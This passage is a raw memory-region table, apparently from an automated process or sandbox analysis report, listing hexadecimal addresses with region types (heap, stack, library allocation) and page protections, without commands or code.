page read and write
|
||
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
898000
|
heap
|
page read and write
|
||
2977000
|
trusted library allocation
|
page read and write
|
||
2A2C9334000
|
trusted library allocation
|
page read and write
|
||
205562C0000
|
heap
|
page read and write
|
||
1DB32551000
|
heap
|
page read and write
|
||
1536000
|
heap
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page read and write
|
||
1B146F54000
|
trusted library allocation
|
page read and write
|
||
2056831F000
|
trusted library allocation
|
page read and write
|
||
206903F6000
|
trusted library allocation
|
page read and write
|
||
28BF000
|
stack
|
page read and write
|
||
1BC6E000
|
stack
|
page read and write
|
||
2057002D000
|
heap
|
page read and write
|
||
13D3000
|
heap
|
page read and write
|
||
7FF848E2B000
|
trusted library allocation
|
page read and write
|
||
7FF848E2D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
BA0000
|
trusted library allocation
|
page read and write
|
||
75E000
|
heap
|
page read and write
|
||
2056FF7B000
|
heap
|
page read and write
|
||
8A0000
|
heap
|
page read and write
|
||
7FF848E5C000
|
trusted library allocation
|
page execute and read and write
|
||
2057047B000
|
heap
|
page read and write
|
||
2A2C943A000
|
trusted library allocation
|
page read and write
|
||
1B134D90000
|
heap
|
page read and write
|
||
28E66817000
|
heap
|
page read and write
|
||
D36000
|
stack
|
page read and write
|
||
2A2C93DD000
|
trusted library allocation
|
page read and write
|
||
FEE6879000
|
stack
|
page read and write
|
||
2A2C93D0000
|
trusted library allocation
|
page read and write
|
||
206EB297000
|
heap
|
page read and write
|
||
2A2C92A2000
|
trusted library allocation
|
page read and write
|
||
1466000
|
heap
|
page read and write
|
||
20680087000
|
trusted library allocation
|
page read and write
|
||
20570420000
|
heap
|
page read and write
|
||
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848DED000
|
trusted library allocation
|
page execute and read and write
|
||
2056824D000
|
trusted library allocation
|
page read and write
|
||
1DB2A476000
|
trusted library allocation
|
page read and write
|
||
1B146F35000
|
trusted library allocation
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page execute and read and write
|
||
97F000
|
stack
|
page read and write
|
||
2056835E000
|
trusted library allocation
|
page read and write
|
||
7FF848E1B000
|
trusted library allocation
|
page read and write
|
||
7FF848E4C000
|
trusted library allocation
|
page execute and read and write
|
||
2A281EF000
|
stack
|
page read and write
|
||
206EB5B5000
|
heap
|
page read and write
|
||
1DB325CD000
|
heap
|
page read and write
|
||
7FF848FC1000
|
trusted library allocation
|
page read and write
|
||
7FF848DE3000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
8BD000
|
heap
|
page read and write
|
||
28E4ED02000
|
trusted library allocation
|
page read and write
|
||
1200000
|
heap
|
page read and write
|
||
CC4BAFF000
|
unkown
|
page read and write
|
||
F95000
|
heap
|
page read and write
|
||
2C4F000
|
trusted library allocation
|
page read and write
|
||
B40000
|
trusted library allocation
|
page read and write
|
||
16B5000
|
heap
|
page read and write
|
||
1B2EF000
|
stack
|
page read and write
|
||
28E667F4000
|
heap
|
page read and write
|
||
ADA000
|
heap
|
page read and write
|
||
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
7FF848FB7000
|
trusted library allocation
|
page read and write
|
||
1B146F5A000
|
trusted library allocation
|
page read and write
|
||
9E90307000
|
stack
|
page read and write
|
||
205597BE000
|
trusted library allocation
|
page read and write
|
||
7DF491610000
|
trusted library allocation
|
page execute and read and write
|
||
CC4BA73000
|
stack
|
page read and write
|
||
1B0B0000
|
heap
|
page execute and read and write
|
||
11D0000
|
heap
|
page read and write
|
||
6EC000
|
heap
|
page read and write
|
||
2A2D14CF000
|
heap
|
page read and write
|
||
7FF849000000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848DF3000
|
trusted library allocation
|
page execute and read and write
|
||
279E000
|
stack
|
page read and write
|
||
2A2C9341000
|
trusted library allocation
|
page read and write
|
||
8F3000
|
heap
|
page read and write
|
||
7FF848FB2000
|
trusted library allocation
|
page read and write
|
||
1B130000
|
heap
|
page read and write
|
||
2200000
|
heap
|
page read and write
|
||
7FF849054000
|
trusted library allocation
|
page read and write
|
||
1B1B0000
|
trusted library allocation
|
page read and write
|
||
1A6C0000
|
trusted library allocation
|
page read and write
|
||
205560F8000
|
heap
|
page read and write
|
||
7DF491600000
|
trusted library allocation
|
page execute and read and write
|
||
2A2C9080000
|
trusted library allocation
|
page read and write
|
||
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
7FF8490C1000
|
trusted library allocation
|
page read and write
|
||
7FF848E06000
|
trusted library allocation
|
page read and write
|
||
1B1AD000
|
stack
|
page read and write
|
||
28E4F029000
|
trusted library allocation
|
page read and write
|
||
9E8F379000
|
stack
|
page read and write
|
||
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
1DB324D0000
|
heap
|
page read and write
|
||
20690470000
|
trusted library allocation
|
page read and write
|
||
7FF849164000
|
trusted library allocation
|
page read and write
|
||
1ABBD000
|
stack
|
page read and write
|
||
1B1370BC000
|
trusted library allocation
|
page read and write
|
||
2A2C9159000
|
trusted library allocation
|
page read and write
|
||
7FF84910F000
|
trusted library allocation
|
page read and write
|
||
2A2C9201000
|
trusted library allocation
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
7FF848FC2000
|
trusted library allocation
|
page read and write
|
||
CC4BE79000
|
stack
|
page read and write
|
||
2A2C91EA000
|
trusted library allocation
|
page read and write
|
||
1B8FF000
|
heap
|
page read and write
|
||
1B14EE90000
|
heap
|
page read and write
|
||
7FF848FA9000
|
trusted library allocation
|
page read and write
|
||
C90000
|
heap
|
page read and write
|
||
880000
|
trusted library allocation
|
page read and write
|
||
20570020000
|
heap
|
page read and write
|
||
2A2D1174000
|
heap
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
FD5000
|
heap
|
page read and write
|
||
1B146E28000
|
trusted library allocation
|
page read and write
|
||
7FF848FE8000
|
trusted library allocation
|
page read and write
|
||
C86000
|
heap
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
28E4F36D000
|
trusted library allocation
|
page read and write
|
||
20681305000
|
trusted library allocation
|
page read and write
|
||
1B146E19000
|
trusted library allocation
|
page read and write
|
||
7FF8491A0000
|
trusted library allocation
|
page read and write
|
||
1B670000
|
heap
|
page read and write
|
||
1DB18317000
|
heap
|
page read and write
|
||
2A2B99E1000
|
trusted library allocation
|
page read and write
|
||
20568213000
|
trusted library allocation
|
page read and write
|
||
246F000
|
stack
|
page read and write
|
||
206ED608000
|
heap
|
page read and write
|
||
1256D000
|
trusted library allocation
|
page read and write
|
||
7FF848FCA000
|
trusted library allocation
|
page read and write
|
||
206ED448000
|
heap
|
page read and write
|
||
1B137D4A000
|
trusted library allocation
|
page read and write
|
||
1B12D000
|
stack
|
page read and write
|
||
820000
|
heap
|
page read and write
|
||
28E665E7000
|
heap
|
page read and write
|
||
7FF849240000
|
trusted library allocation
|
page read and write
|
||
7FF8490D1000
|
trusted library allocation
|
page read and write
|
||
1BA9B000
|
heap
|
page read and write
|
||
2A2C927D000
|
trusted library allocation
|
page read and write
|
||
1B2B3000
|
stack
|
page read and write
|
||
1B146F61000
|
trusted library allocation
|
page read and write
|
||
5E5000
|
heap
|
page read and write
|
||
205682B2000
|
trusted library allocation
|
page read and write
|
||
2069045D000
|
trusted library allocation
|
page read and write
|
||
1B14F008000
|
heap
|
page read and write
|
||
9E8F2FF000
|
stack
|
page read and write
|
||
7FF849280000
|
trusted library allocation
|
page read and write
|
||
7FF849060000
|
trusted library allocation
|
page read and write
|
||
7FF848DF2000
|
trusted library allocation
|
page read and write
|
||
C1B000
|
heap
|
page read and write
|
||
1B6D4000
|
heap
|
page read and write
|
||
7FF84915A000
|
trusted library allocation
|
page read and write
|
||
28E667D2000
|
heap
|
page read and write
|
||
1B14702A000
|
trusted library allocation
|
page read and write
|
||
1BBE0000
|
heap
|
page read and write
|
||
7FF848FCA000
|
trusted library allocation
|
page read and write
|
||
1B98E000
|
stack
|
page read and write
|
||
1B14F0EF000
|
heap
|
page read and write
|
||
1BA90000
|
heap
|
page read and write
|
||
FAC000
|
heap
|
page read and write
|
||
1760000
|
heap
|
page read and write
|
||
92D000
|
heap
|
page read and write
|
||
2A2C92BD000
|
trusted library allocation
|
page read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
2A2C9076000
|
trusted library allocation
|
page read and write
|
||
24CF000
|
stack
|
page read and write
|
||
205681B8000
|
trusted library allocation
|
page read and write
|
||
1BA83000
|
stack
|
page read and write
|
||
2069029B000
|
trusted library allocation
|
page read and write
|
||
2069041C000
|
trusted library allocation
|
page read and write
|
||
20567FE0000
|
trusted library allocation
|
page read and write
|
||
570000
|
heap
|
page read and write
|
||
1DB325DD000
|
heap
|
page read and write
|
||
2A2BA34F000
|
trusted library allocation
|
page read and write
|
||
1220000
|
trusted library allocation
|
page read and write
|
||
1B98E000
|
stack
|
page read and write
|
||
7FF849169000
|
trusted library allocation
|
page read and write
|
||
205682ED000
|
trusted library allocation
|
page read and write
|
||
205681E2000
|
trusted library allocation
|
page read and write
|
||
1A840000
|
trusted library allocation
|
page read and write
|
||
20568244000
|
trusted library allocation
|
page read and write
|
||
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
7FF848E0B000
|
trusted library allocation
|
page read and write
|
||
FEE69FD000
|
stack
|
page read and write
|
||
206ECD85000
|
heap
|
page read and write
|
||
7FF849260000
|
trusted library allocation
|
page read and write
|
||
16B0000
|
heap
|
page read and write
|
||
20690437000
|
trusted library allocation
|
page read and write
|
||
7FF848E1B000
|
trusted library allocation
|
page read and write
|
||
2A2C9060000
|
trusted library allocation
|
page read and write
|
||
B0A000
|
heap
|
page read and write
|
||
1B39F000
|
stack
|
page read and write
|
||
20690439000
|
trusted library allocation
|
page read and write
|
||
6DA000
|
heap
|
page read and write
|
||
206ECCA0000
|
heap
|
page execute and read and write
|
||
14A0000
|
trusted library allocation
|
page read and write
|
||
205682C1000
|
trusted library allocation
|
page read and write
|
||
12A03000
|
trusted library allocation
|
page read and write
|
||
14D0000
|
heap
|
page read and write
|
||
2B0000
|
unkown
|
page readonly
|
||
7FF849180000
|
trusted library allocation
|
page read and write
|
||
A6F000
|
stack
|
page read and write
|
||
20681DDC000
|
trusted library allocation
|
page read and write
|
||
1B8C7000
|
heap
|
page read and write
|
||
12433000
|
trusted library allocation
|
page read and write
|
||
855000
|
heap
|
page read and write
|
||
13441000
|
trusted library allocation
|
page read and write
|
||
7FF848EA6000
|
trusted library allocation
|
page read and write
|
||
7FF848E3D000
|
trusted library allocation
|
page execute and read and write
|
||
2A2C9320000
|
trusted library allocation
|
page read and write
|
||
2A2C9297000
|
trusted library allocation
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
B00000
|
trusted library allocation
|
page read and write
|
||
2A2C903C000
|
trusted library allocation
|
page read and write
|
||
1B146F9C000
|
trusted library allocation
|
page read and write
|
||
14D8000
|
heap
|
page read and write
|
||
1B1BE000
|
stack
|
page read and write
|
||
D8F000
|
stack
|
page read and write
|
||
FEE68FE000
|
stack
|
page read and write
|
||
1B748000
|
heap
|
page read and write
|
||
CC4C13E000
|
stack
|
page read and write
|
||
28E4C54A000
|
heap
|
page read and write
|
||
1578000
|
heap
|
page read and write
|
||
A30000
|
heap
|
page read and write
|
||
7FF848E08000
|
trusted library allocation
|
page read and write
|
||
7FF848DF2000
|
trusted library allocation
|
page read and write
|
||
7AB000
|
heap
|
page read and write
|
||
7FF848FA2000
|
trusted library allocation
|
page read and write
|
||
1B137CAD000
|
trusted library allocation
|
page read and write
|
||
7C0000
|
heap
|
page read and write
|
||
2A2C9110000
|
trusted library allocation
|
page read and write
|
||
2AFF000
|
stack
|
page read and write
|
||
7FF848DF0000
|
trusted library allocation
|
page read and write
|
||
C21000
|
heap
|
page read and write
|
||
FEE66FF000
|
stack
|
page read and write
|
||
150F000
|
heap
|
page read and write
|
||
7FF848FAE000
|
trusted library allocation
|
page read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
20570156000
|
heap
|
page read and write
|
||
206EB306000
|
heap
|
page read and write
|
||
7FF848DE3000
|
trusted library allocation
|
page execute and read and write
|
||
1CC00000
|
heap
|
page read and write
|
||
1B134E58000
|
heap
|
page read and write
|
||
2A2C904E000
|
trusted library allocation
|
page read and write
|
||
205683B4000
|
trusted library allocation
|
page read and write
|
||
BBE000
|
heap
|
page read and write
|
||
9F7000
|
heap
|
page read and write
|
||
2A2C915F000
|
trusted library allocation
|
page read and write
|
||
205680BE000
|
trusted library allocation
|
page read and write
|
||
1C14E000
|
stack
|
page read and write
|
||
1B78B000
|
stack
|
page read and write
|
||
2670000
|
heap
|
page execute and read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
D60000
|
heap
|
page read and write
|
||
2A2C9236000
|
trusted library allocation
|
page read and write
|
||
CC4BBFE000
|
stack
|
page read and write
|
||
1067000
|
heap
|
page read and write
|
||
2056826A000
|
trusted library allocation
|
page read and write
|
||
1B14F010000
|
heap
|
page read and write
|
||
28E4C55E000
|
heap
|
page read and write
|
||
7FF848FE0000
|
trusted library allocation
|
page execute and read and write
|
||
28E4F486000
|
trusted library allocation
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
206ED67F000
|
heap
|
page read and write
|
||
2A2C91C6000
|
trusted library allocation
|
page read and write
|
||
2A2C9310000
|
trusted library allocation
|
page read and write
|
||
205682C8000
|
trusted library allocation
|
page read and write
|
||
1B6CB000
|
heap
|
page read and write
|
||
7FF848FE2000
|
trusted library allocation
|
page read and write
|
||
1528000
|
heap
|
page read and write
|
||
26DA000
|
trusted library allocation
|
page read and write
|
||
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
1B14ED42000
|
heap
|
page read and write
|
||
2A2C9064000
|
trusted library allocation
|
page read and write
|
||
2A28ABE000
|
stack
|
page read and write
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
28E4C5FC000
|
heap
|
page read and write
|
||
2A2C9135000
|
trusted library allocation
|
page read and write
|
||
7FF849090000
|
trusted library allocation
|
page read and write
|
||
7FF848F97000
|
trusted library allocation
|
page read and write
|
||
7FF848FF0000
|
trusted library allocation
|
page read and write
|
||
1BBBF000
|
stack
|
page read and write
|
||
28E4F341000
|
trusted library allocation
|
page read and write
|
||
8B0000
|
heap
|
page read and write
|
||
EB5000
|
heap
|
page read and write
|
||
2A2C9433000
|
trusted library allocation
|
page read and write
|
||
2A2C902C000
|
trusted library allocation
|
page read and write
|
||
205681A2000
|
trusted library allocation
|
page read and write
|
||
7FF848E0D000
|
trusted library allocation
|
page execute and read and write
|
||
205682D5000
|
trusted library allocation
|
page read and write
|
||
7FF848E96000
|
trusted library allocation
|
page read and write
|
||
7FF848FAE000
|
trusted library allocation
|
page read and write
|
||
9AB000
|
heap
|
page read and write
|
||
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
20568321000
|
trusted library allocation
|
page read and write
|
||
12BA1000
|
trusted library allocation
|
page read and write
|
||
28E5E5A7000
|
trusted library allocation
|
page read and write
|
||
C5356FF000
|
stack
|
page read and write
|
||
1B5E0000
|
heap
|
page read and write
|
||
1750000
|
trusted library allocation
|
page read and write
|
||
7FF848DF4000
|
trusted library allocation
|
page read and write
|
||
20558FC1000
|
trusted library allocation
|
page read and write
|
||
206902ED000
|
trusted library allocation
|
page read and write
|
||
1DB19DC0000
|
heap
|
page execute and read and write
|
||
16CF000
|
stack
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
260B000
|
trusted library allocation
|
page read and write
|
||
1B146EA2000
|
trusted library allocation
|
page read and write
|
||
3C0000
|
heap
|
page read and write
|
||
2057057A000
|
heap
|
page read and write
|
||
1DB2A469000
|
trusted library allocation
|
page read and write
|
||
20559D0C000
|
trusted library allocation
|
page read and write
|
||
32A5000
|
trusted library allocation
|
page read and write
|
||
7FF848E04000
|
trusted library allocation
|
page read and write
|
||
7FF8490E8000
|
trusted library allocation
|
page read and write
|
||
2A2C91D3000
|
trusted library allocation
|
page read and write
|
||
7FF84915C000
|
trusted library allocation
|
page read and write
|
||
26CD000
|
trusted library allocation
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
2A289BF000
|
stack
|
page read and write
|
||
20690021000
|
trusted library allocation
|
page read and write
|
||
12563000
|
trusted library allocation
|
page read and write
|
||
7FF848E23000
|
trusted library allocation
|
page read and write
|
||
ADC000
|
heap
|
page read and write
|
||
7FF848E03000
|
trusted library allocation
|
page execute and read and write
|
||
20570440000
|
heap
|
page read and write
|
||
1730000
|
trusted library allocation
|
page read and write
|
||
7FF848E3C000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848EE6000
|
trusted library allocation
|
page execute and read and write
|
||
205704C7000
|
heap
|
page read and write
|
||
28E5E2B1000
|
trusted library allocation
|
page read and write
|
||
1B146F7D000
|
trusted library allocation
|
page read and write
|
||
7FF849085000
|
trusted library allocation
|
page read and write
|
||
E60000
|
heap
|
page read and write
|
||
1DB18430000
|
trusted library allocation
|
page read and write
|
||
590000
|
heap
|
page read and write
|
||
758000
|
heap
|
page read and write
|
||
2681000
|
trusted library allocation
|
page read and write
|
||
1B8B9000
|
heap
|
page read and write
|
||
7FF848E4C000
|
trusted library allocation
|
page execute and read and write
|
||
1B3BE000
|
stack
|
page read and write
|
||
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
1B134C90000
|
heap
|
page read and write
|
||
1495000
|
heap
|
page read and write
|
||
2A2C9121000
|
trusted library allocation
|
page read and write
|
||
1A460000
|
trusted library allocation
|
page read and write
|
||
1B134E0D000
|
heap
|
page read and write
|
||
2A2C9078000
|
trusted library allocation
|
page read and write
|
||
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
1AF5E000
|
stack
|
page read and write
|
||
1B78E000
|
stack
|
page read and write
|
||
7FF848FA9000
|
trusted library allocation
|
page read and write
|
||
7FF848EC6000
|
trusted library allocation
|
page read and write
|
||
1B14EBF1000
|
heap
|
page read and write
|
||
BC0000
|
heap
|
page read and write
|
||
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
7FF848FBA000
|
trusted library allocation
|
page read and write
|
||
12568000
|
trusted library allocation
|
page read and write
|
||
1B14707D000
|
trusted library allocation
|
page read and write
|
||
1415000
|
heap
|
page read and write
|
||
366000
|
stack
|
page read and write
|
||
205682B4000
|
trusted library allocation
|
page read and write
|
||
2A2B91B8000
|
trusted library allocation
|
page read and write
|
||
2A2C91CC000
|
trusted library allocation
|
page read and write
|
||
2A2C9315000
|
trusted library allocation
|
page read and write
|
||
1B136BE0000
|
heap
|
page execute and read and write
|
||
1DB183B0000
|
heap
|
page read and write
|
||
1B000000
|
heap
|
page read and write
|
||
12E0000
|
heap
|
page read and write
|
||
12CBD000
|
trusted library allocation
|
page read and write
|
||
1B146EDD000
|
trusted library allocation
|
page read and write
|
||
7FF848FF8000
|
trusted library allocation
|
page read and write
|
||
7FF849110000
|
trusted library allocation
|
page read and write
|
||
7FF848FB0000
|
trusted library allocation
|
page execute and read and write
|
||
2A2BAD92000
|
trusted library allocation
|
page read and write
|
||
7FF848F90000
|
trusted library allocation
|
page read and write
|
||
1B13847D000
|
trusted library allocation
|
page read and write
|
||
95F000
|
stack
|
page read and write
|
||
2A2C911D000
|
trusted library allocation
|
page read and write
|
||
322F000
|
trusted library allocation
|
page read and write
|
||
205562B0000
|
heap
|
page execute and read and write
|
||
28E4EEAE000
|
trusted library allocation
|
page read and write
|
||
1DB18250000
|
heap
|
page read and write
|
||
2A280E3000
|
stack
|
page read and write
|
||
7FF848ED0000
|
trusted library allocation
|
page read and write
|
||
7FF849200000
|
trusted library allocation
|
page read and write
|
||
1B146E8A000
|
trusted library allocation
|
page read and write
|
||
7FF848FA0000
|
trusted library allocation
|
page read and write
|
||
20568367000
|
trusted library allocation
|
page read and write
|
||
CC4C03B000
|
stack
|
page read and write
|
||
7AD000
|
heap
|
page read and write
|
||
28E4F246000
|
trusted library allocation
|
page read and write
|
||
31FE000
|
trusted library allocation
|
page read and write
|
||
20568133000
|
trusted library allocation
|
page read and write
|
||
128C8000
|
trusted library allocation
|
page read and write
|
||
2A2B9FBE000
|
trusted library allocation
|
page read and write
|
||
14F3000
|
heap
|
page read and write
|
||
1A500000
|
trusted library allocation
|
page read and write
|
||
3227000
|
trusted library allocation
|
page read and write
|
||
1508000
|
heap
|
page read and write
|
||
7FF848FB2000
|
trusted library allocation
|
page read and write
|
||
1DB3238C000
|
heap
|
page read and write
|
||
281F000
|
stack
|
page read and write
|
||
28E4EEA6000
|
trusted library allocation
|
page read and write
|
||
28E666E2000
|
heap
|
page read and write
|
||
6EA000
|
heap
|
page read and write
|
||
28E5E5B7000
|
trusted library allocation
|
page read and write
|
||
20690221000
|
trusted library allocation
|
page read and write
|
||
1B147070000
|
trusted library allocation
|
page read and write
|
||
7FF849140000
|
trusted library allocation
|
page read and write
|
||
1B760000
|
heap
|
page execute and read and write
|
||
640000
|
heap
|
page read and write
|
||
7FF8490E0000
|
trusted library allocation
|
page read and write
|
||
1B0EF000
|
stack
|
page read and write
|
||
9E8F1FF000
|
stack
|
page read and write
|
||
11C0000
|
heap
|
page read and write
|
||
7FF849070000
|
trusted library allocation
|
page read and write
|
||
206ECD60000
|
heap
|
page read and write
|
||
7FF848E10000
|
trusted library allocation
|
page read and write
|
||
2608000
|
trusted library allocation
|
page read and write
|
||
7FF8490F0000
|
trusted library allocation
|
page read and write
|
||
2A2B9016000
|
trusted library allocation
|
page read and write
|
||
1B137961000
|
trusted library allocation
|
page read and write
|
||
1B146DF7000
|
trusted library allocation
|
page read and write
|
||
7FF848E02000
|
trusted library allocation
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
7FF848FD4000
|
trusted library allocation
|
page read and write
|
||
1C13E000
|
stack
|
page read and write
|
||
1B364000
|
stack
|
page read and write
|
||
AAE000
|
stack
|
page read and write
|
||
20567FFD000
|
trusted library allocation
|
page read and write
|
||
5EF000
|
heap
|
page read and write
|
||
20570167000
|
heap
|
page read and write
|
||
820000
|
trusted library allocation
|
page read and write
|
||
2069027C000
|
trusted library allocation
|
page read and write
|
||
7FF848FA2000
|
trusted library allocation
|
page read and write
|
||
172F000
|
stack
|
page read and write
|
||
7FF848F45000
|
trusted library allocation
|
page execute and read and write
|
||
7FF849175000
|
trusted library allocation
|
page read and write
|
||
7FF849010000
|
trusted library allocation
|
page read and write
|
||
20568324000
|
trusted library allocation
|
page read and write
|
||
28E4E170000
|
trusted library allocation
|
page read and write
|
||
7FF849164000
|
trusted library allocation
|
page read and write
|
||
2A2D1168000
|
heap
|
page read and write
|
||
1B134E19000
|
heap
|
page read and write
|
||
CAF000
|
stack
|
page read and write
|
||
CC4BFB8000
|
stack
|
page read and write
|
||
2A2C91E8000
|
trusted library allocation
|
page read and write
|
||
2A2C93A3000
|
trusted library allocation
|
page read and write
|
||
7FF848E4C000
|
trusted library allocation
|
page execute and read and write
|
||
2A2C91DE000
|
trusted library allocation
|
page read and write
|
||
7DF4CBEB0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF8490D0000
|
trusted library allocation
|
page read and write
|
||
CC4C2BB000
|
stack
|
page read and write
|
||
1B68F000
|
stack
|
page read and write
|
||
13DA000
|
heap
|
page read and write
|
||
2A2C91AA000
|
trusted library allocation
|
page read and write
|
||
2A2B7240000
|
trusted library allocation
|
page read and write
|
||
1B146EFF000
|
trusted library allocation
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page read and write
|
||
206ED420000
|
heap
|
page read and write
|
||
945000
|
heap
|
page read and write
|
||
7FF849178000
|
trusted library allocation
|
page read and write
|
||
205682EF000
|
trusted library allocation
|
page read and write
|
||
2A2BADB2000
|
trusted library allocation
|
page read and write
|
||
7FF8490C0000
|
trusted library allocation
|
page read and write
|
||
206EB233000
|
heap
|
page read and write
|
||
7FF848EF6000
|
trusted library allocation
|
page execute and read and write
|
||
145D000
|
heap
|
page read and write
|
||
1B146F9A000
|
trusted library allocation
|
page read and write
|
||
62B000
|
heap
|
page read and write
|
||
1B146F82000
|
trusted library allocation
|
page read and write
|
||
7FF849020000
|
trusted library allocation
|
page read and write
|
||
1B00D000
|
stack
|
page read and write
|
||
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
7FF848F30000
|
trusted library allocation
|
page execute and read and write
|
||
920000
|
heap
|
page read and write
|
||
2A2C9224000
|
trusted library allocation
|
page read and write
|
||
2A2C909D000
|
trusted library allocation
|
page read and write
|
||
28E4C58A000
|
heap
|
page read and write
|
||
7FF848E28000
|
trusted library allocation
|
page read and write
|
||
20690228000
|
trusted library allocation
|
page read and write
|
||
1DB2A181000
|
trusted library allocation
|
page read and write
|
||
7FF848EAC000
|
trusted library allocation
|
page execute and read and write
|
||
7FF848E1D000
|
trusted library allocation
|
page execute and read and write
|
||
1B146E34000
|
trusted library allocation
|
page read and write
|
||
1B88E000
|
stack
|
page read and write
|
||
7FF849050000
|
trusted library allocation
|
page read and write
|
||
8F0000
|
heap
|
page read and write
|
||
FEE6D3E000
|
stack
|
page read and write
|
||
1B220000
|
trusted library allocation
|
page read and write
|
||
7FF848E3B000
|
trusted library allocation
|
page execute and read and write
|
||
2A288B8000
|
stack
|
page read and write
|
||
1510000
|
heap
|
page read and write
|
||
205682BB000
|
trusted library allocation
|
page read and write
|
||
1B147003000
|
trusted library allocation
|
page read and write
|
||
2B26000
|
trusted library allocation
|
page read and write
|
||
8F0000
|
heap
|
page read and write
|
||
1C707000
|
stack
|
page read and write
|
||
C3F000
|
heap
|
page read and write
|
||
20690316000
|
trusted library allocation
|
page read and write
|
||
5DB000
|
heap
|
page read and write
|
||
1AE50000
|
heap
|
page read and write
|
||
206ED58D000
|
heap
|
page read and write
|
||
2A2C911A000
|
trusted library allocation
|
page read and write
|
||
360000
|
heap
|
page read and write
|
||
2A2C931E000
|
trusted library allocation
|
page read and write
|
||
334000
|
unkown
|
page readonly
|
||
C8C000
|
heap
|
page read and write
|
||
205682C3000
|
trusted library allocation
|
page read and write
|
||
7FF848E00000
|
trusted library allocation
|
page read and write
|
||
262E000
|
stack
|
page read and write
|
||
B30000
|
trusted library allocation
|
page read and write
|
||
206903B3000
|
trusted library allocation
|
page read and write
|
||
7FF848F20000
|
trusted library allocation
|
page execute and read and write
|
||
925000
|
heap
|
page read and write
|
||
2A2968E000
|
stack
|
page read and write
|
||
8D0000
|
heap
|
page read and write
|
||
9E9038C000
|
stack
|
page read and write
|
||
922000
|
heap
|
page read and write
|
||
20557BE5000
|
heap
|
page read and write
|
||
1269D000
|
trusted library allocation
|
page read and write
|
||
1B160000
|
heap
|
page execute and read and write
|
||
1B635000
|
stack
|
page read and write
|
||
BED000
|
heap
|
page read and write
|
||
1BF43000
|
stack
|
page read and write
|
||
7FF848FD2000
|
trusted library allocation
|
page read and write
|
||
6F6000
|
stack
|
page read and write
|
||
12C23000
|
trusted library allocation
|
page read and write
|
||
7FF848F89000
|
trusted library allocation
|
page read and write
|
||
7DF4691A0000
|
trusted library allocation
|
page execute and read and write
|
||
AF6000
|
stack
|
page read and write
|
||
93F000
|
heap
|
page read and write
|
||
13443000
|
trusted library allocation
|
page read and write
|
||
7FF848FF8000
|
trusted library allocation
|
page read and write
|
||
1B146FA0000
|
trusted library allocation
|
page read and write
|
||
2055610D000
|
heap
|
page read and write
|
||
965000
|
heap
|
page read and write
|
||
20690242000
|
trusted library allocation
|
page read and write
|
||
9E8F073000
|
stack
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page execute and read and write
|
||
206818F1000
|
trusted library allocation
|
page read and write
|
||
7FF849280000
|
trusted library allocation
|
page read and write
|
||
7FF848E13000
|
trusted library allocation
|
page read and write
|
||
1B146E92000
|
trusted library allocation
|
page read and write
|
||
7FF849180000
|
trusted library allocation
|
page read and write
|
||
BCF000
|
stack
|
page read and write
|
||
2A2C914C000
|
trusted library allocation
|
page read and write
|
||
2A2C91FE000
|
trusted library allocation
|
page read and write
|
||
7FF848E22000
|
trusted library allocation
|
page read and write
|
||
1BDDE000
|
stack
|
page read and write
|
||
EF6000
|
stack
|
page read and write
|
||
1070000
|
heap
|
page read and write
|
||
7E0000
|
heap
|
page read and write
|
||
7FF848E4C000
|
trusted library allocation
|
page execute and read and write
|
||
1B0AE000
|
stack
|
page read and write
|
||
2056805E000
|
trusted library allocation
|
page read and write
|
||
246F000
|
stack
|
page read and write
|
||
1B134F40000
|
heap
|
page read and write
|
||
8F4000
|
heap
|
page read and write
|
||
26C0000
|
heap
|
page read and write
|
||
1A520000
|
trusted library allocation
|
page read and write
|
||
2A2C933F000
|
trusted library allocation
|
page read and write
|
||
7FF848DFB000
|
trusted library allocation
|
page read and write
|
||
1B147015000
|
trusted library allocation
|
page read and write
|
||
1B5C0000
|
heap
|
page read and write
|
||
7FF849130000
|
trusted library allocation
|
page read and write
|
||
1B146F08000
|
trusted library allocation
|
page read and write
|
||
7FF8490A0000
|
trusted library allocation
|
page read and write
|
||
20556200000
|
heap
|
page readonly
|
||
CF0000
|
trusted library allocation
|
page read and write
|
||
2A2D10EE000
|
heap
|
page read and write
|
||
7FF848ED6000
|
trusted library allocation
|
page execute and read and write
|
||
2C49000
|
trusted library allocation
|
page read and write
|
||
1B05F000
|
stack
|
page read and write
|
||
2250000
|
heap
|
page read and write
|
||
C96B207000
|
stack
|
page read and write
|
||
